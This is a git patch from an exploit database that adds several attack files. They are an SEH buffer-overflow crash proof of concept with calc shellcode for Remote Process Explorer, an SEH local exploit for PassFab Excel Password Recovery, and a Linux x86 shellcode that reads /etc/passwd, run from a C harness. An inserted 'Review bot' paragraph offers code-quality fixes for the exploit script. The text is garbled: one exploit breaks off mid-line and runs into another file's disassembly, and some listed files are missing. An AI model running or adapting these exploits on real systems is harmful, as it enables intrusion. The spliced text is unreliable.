From 6050f45223fbab7c9ccf8b9ba1fbe42802ee4479 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 2 Feb 2019 05:01:47 +0000
Subject: [PATCH] DB: 2019-02-02

4 changes to exploits/shellcodes

Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)
PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit
SureMDM < 2018-11 Patch - Local / Remote File Inclusion
Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)
---
 exploits/windows/dos/46304.py | 95 ++++++++++++++++++++++++++++++
 exploits/windows/local/46301.py | 59 +++++++++++++++++++
 exploits/windows/webapps/46305.txt | 13 ++++
 files_exploits.csv | 3 +
 files_shellcodes.csv | 1 +
 shellcodes/linux_x86/46302.c | 78 ++++++++++++++++++++++++
 6 files changed, 249 insertions(+)
 create mode 100755 exploits/windows/dos/46304.py
 create mode 100755 exploits/windows/local/46301.py
 create mode 100644 exploits/windows/webapps/46305.txt
 create mode 100644 shellcodes/linux_x86/46302.c

diff --git a/exploits/windows/dos/46304.py b/exploits/windows/dos/46304.py
new file mode 100755
index 000000000..09252817c
--- /dev/null
+++ b/exploits/windows/dos/46304.py
@@ -0,0 +1,95 @@
+# Exploit Title: Remote Process Explorer v1.0.0.16 - Denial of Service (PoC) and SEH overwritten Crash PoC
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2019-01-30
+# Vendor Homepage: http://lizardsystems.com/action.php?action=home&product=rpexplorer&version=1.0.0.16
+# Software Link : http://lizardsystems.com/action.php?action=home&product=rpexplorer&version=1.0.0.16
+# Tested Version: 1.0.0.16
+# Tested on: Windows XP SP3
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run rpexplorer.exe
+# 2.- copy content rpexplorer_Crash.txt to clipboard (result from this python script)
+# 3.- Go to "Add computer" and paste the result in the first textbox and click in Add button.
+# 4.- Select "AAAAAAAAA...." computer, right mouse button and Connect and you will see a crash.
+
+'''
+
+Detect:
+
+SEH chain of thread 00000144
+Address SE handler
+0114FEC8 78413977
+41387741 *** CORRUPT ENTRY ***
+
+EAX 0114FEBC
+ECX 0114FEC0 ASCII
+"w5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2B
+EDX 41347741
+EBX 0116236C
+ESP 0114FBF0
+EBP 0114FEC0 ASCII
+"w5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2B
+ESI 000000D4
+EDI 00000000
+EIP 00404F48 rpexplor.00404F48
+C 0 ES 0023 32bit 0(FFFFFFFF)
+P 1 CS 001B 32bit 0(FFFFFFFF)
+A 0 SS 0023 32bit 0(FFFFFFFF)
+Z 0 DS 0023 32bit 0(FFFFFFFF)
+S 0 FS 003B 32bit 7FFDC000(FFF)
+T 0 GS 0000 NULL
+D 0
+O 0 LastErr ERROR_SUCCESS (00000000)
+EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
+ST0 empty
+ST1 empty
+ST2 empty
+ST3 empty
+ST4 empty
+ST5 empty
+ST6 empty
+ST7 empty
+ 3 2 1 0 E S P U O Z D I
+FST 0000 Cond 0 0 
0 0 Err 0 0 0 0 0 0 0 0 (GT)
+FCW 1272 Prec NEAR,53 Mask 1 1 0 0 1 0
+
+Log data, item 24
+ Address=0BADF00D
+ Message= SEH record (nseh field) at 0x0114fec8 overwritten with normal
+pattern : 0x41387741 (offset 684), followed by 308 bytes of cyclic data
+after the handler
+
+Check after script:
+
+SEH chain of thread 00000D04
+Address SE handler
+0114FEC8 43434343
+42424242 *** CORRUPT ENTRY ***
+
+
+Log data, item 53
+ Address=7E6E5E50
+ Message= 0x7e6e5e50 : pop ebx # pop ebp # ret 0x04 | asciiprint,ascii
+{PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH:
+True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
+
+
+'''
+
+#!/usr/bin/env python
+
+'''
+calc = ("\x31\xC9" # xor ecx,ecx
+ "\x51" # push ecx
+ "\x68\x63\x61\x6C\x63" # push 0x636c6163
+ "\x54" # push dword ptr esp
+ "\xB8\xC7\x93\xC2\x77" # mov eax,0x77c293c7
+ "\xFF\xD0") # call eax
+'''
+
+crash = "\x41" * 684 + "BBBB" + "CCCC"
+#crash = "\x41" * 684 + "\xEB\x14\x90\x90" + "\x50\x5e\x6e\x7e" + "\x90" * 24 + calc + "A"*(1000 - 32)
+f = open ("rpexplorer_Crash.txt", "w")
+f.write(crash)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46301.py b/exploits/windows/local/46301.py
new file mode 100755
index 000000000..8de61c35e
--- /dev/null
+++ b/exploits/windows/local/46301.py
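Review bot: The `#!/usr/bin/env python` line is placed after the header comments and the first `'''` block, so it is not a shebang and has no effect; either move it to line 1 or drop it. The file handling at the end, `f = open ("rpexplorer_Crash.txt", "w")` / `f.write(crash)` / `f.close()`, leaves the handle open if `write` raises; a `with open("rpexplorer_Crash.txt", "w") as f: f.write(crash)` block closes it on every path. The commented-out `calc` docstring and the second `crash` assignment are dead text that a reader has to mentally skip; a one-line comment saying they are unused would make the intent clearer if they are kept.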
@@ -0,0 +1,59 @@
+# Exploit Title: PassFab Excel Password Recovery SEH Local Exploit
+# Date: 31.01.19
+# Vendor Homepage:https://www.passfab.com/products/excel-password-recovery.html
+# Software Link: https://www.passfab.com/downloads/passfab-excel-password-recovery.exe
+# Exploit Author: Achilles
+# Tested Version: 8.3.1
+# Tested on: Windows XP SP3
+
+
+# 1.- Run python code : PassFab_RAR
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open PassFab RAR Password Recovery
+# 4.- In the new Window click on the key in the upper right corner
+# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Registration Code'
+# 6.- Click 'Register'and the calculator will open
+# 7.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/env python
+import struct
+
+buffer = "\x41" * 260
+NSEH = "\xeb\x06\x90\x90" #jmp short 6
+SEH = struct.pack(':
+ 8048060: eb 28 jmp 804808a
+
+08048062 :
+ 8048062: 5b pop ebx
+ 8048063: 31 c9 xor ecx,ecx
+ 8048065: f7 e1 mul ecx
+ 8048067: 99 cdq
+ 8048068: b0 05 mov al,0x5
+ 804806a: cd 80 int 0x80
+
+0804806c :
+ 804806c: 89 c3 mov ebx,eax
+ 804806e: b0 03 mov al,0x3
+ 8048070: 89 e7 mov edi,esp
+ 8048072: 89 f9 mov ecx,edi
+ 8048074: 31 d2 xor edx,edx
+ 8048076: b2 ff mov dl,0xff
+ 8048078: cd 80 int 0x80
+
+0804807a :
+ 804807a: 89 c2 mov edx,eax
+ 804807c: 31 c0 xor eax,eax
+ 804807e: b0 04 mov al,0x4
+ 8048080: 31 db xor ebx,ebx
+ 8048082: b3 01 mov bl,0x1
+ 8048084: cd 80 int 0x80
+
+08048086 :
+ 8048086: b0 01 mov al,0x1
+ 8048088: cd 80 int 0x80
+
+0804808a :
+ 804808a: e8 d3 ff ff ff call 8048062
+
+0804808f :
+ 804808f: 2f das
+ 8048090: 65 74 63 gs je 80480f6
+ 8048093: 2f das
+ 8048094: 70 61 jo 80480f7
+ 8048096: 73 73 jae 804810b
+ 8048098: 77 64 ja 80480fe
+******************************************************************/
+
+#include
+#include
+
+unsigned char code[] = 
"\xeb\x28\x5b\x31\xc9\xf7\xe1\x99\xb0\x05\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb2\xff\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+int main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+ return 0;
+}
\ No newline at end of file